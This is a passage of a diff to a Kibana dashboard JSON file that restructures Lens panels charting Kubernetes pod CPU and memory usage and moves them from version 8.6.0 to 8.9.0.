"a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", 
- "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "61027d7f-6398-4aec-b154-897b913481e4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + 
"parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "61027d7f-6398-4aec-b154-897b913481e4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + 
"layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 15, - "i": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", - "w": 24, - "x": 24, - "y": 19 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", - "title": "CPU Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ace482cc-b33b-47c1-89b1-a710fe45195e", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "98677dcb-ab94-47e8-94ca-326470ee2380", + "w": 24, + "x": 0, + "y": 34 + }, + "panelIndex": "98677dcb-ab94-47e8-94ca-326470ee2380", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ace482cc-b33b-47c1-89b1-a710fe45195e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + 
"formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.node.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - 
"orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.node.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ace482cc-b33b-47c1-89b1-a710fe45195e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - 
"showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ace482cc-b33b-47c1-89b1-a710fe45195e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "98677dcb-ab94-47e8-94ca-326470ee2380", - "w": 24, - "x": 0, - "y": 34 + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": 
"98677dcb-ab94-47e8-94ca-326470ee2380", - "title": "Memory Usage as Pct of the Total Node Memory [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "81de779f-3d8f-4f90-9a93-08ecf5d96939", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory Usage as Pct of the Total Node Memory [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "5575d413-c4a4-4e34-8605-54f82e5e05b3", + "w": 24, + "x": 24, + "y": 34 + }, + "panelIndex": "5575d413-c4a4-4e34-8605-54f82e5e05b3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "81de779f-3d8f-4f90-9a93-08ecf5d96939", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + 
"id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + 
"scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "81de779f-3d8f-4f90-9a93-08ecf5d96939", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": 
"kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "81de779f-3d8f-4f90-9a93-08ecf5d96939", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "5575d413-c4a4-4e34-8605-54f82e5e05b3", - "w": 24, - "x": 24, - "y": 34 + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "5575d413-c4a4-4e34-8605-54f82e5e05b3", - "title": "Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - 
"id": "metrics-*", - "name": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "435eeb17-c28a-4bde-9c43-b85d8e463c03", + "w": 24, + "x": 0, + "y": 49 + }, + "panelIndex": "435eeb17-c28a-4bde-9c43-b85d8e463c03", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - 
"isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.working_set.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.working_set.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": 
"9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": 
[], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "435eeb17-c28a-4bde-9c43-b85d8e463c03", - "w": 24, - "x": 0, - "y": 49 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "435eeb17-c28a-4bde-9c43-b85d8e463c03", - "title": "Working Set Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working Set Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", + "w": 24, + "x": 24, + "y": 49 + }, + "panelIndex": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": 
